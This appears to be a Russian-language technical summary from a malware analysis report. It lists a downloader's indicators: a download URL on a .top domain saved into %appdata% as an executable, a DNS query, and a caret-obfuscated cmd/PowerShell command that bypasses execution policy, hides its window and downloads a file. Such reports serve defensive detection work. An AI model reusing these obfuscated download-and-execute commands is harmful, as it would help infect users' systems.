Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWE^rsH^el^L^.E^X^e^ -E^xEcu^Ti^ONp^O^liCy bYP^As^S^ ^-Noprof^i^LE ^-w^InDoWSt^yle h^I^Dde^N (n^e^W-OBjecT^ ^SySteM.NE^T^.^We^b^CLieNt^).dowN^L^oaDfil^e('http://zonexxopera.to...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "poWE^rsH^el^L^.E^X^e^ -E^xEcu^Ti^ONp^O^liCy bYP^As^S^ ^-Noprof^i^LE ^-w^InDoWSt^yle h^I^Dde^N (n^e^W-OBjecT^ ^SySteM.NE^T^.^We^b^CLieNt^).dowN^L^oaDfil^e('http://zonexxopera.to...' (со скрытым окном)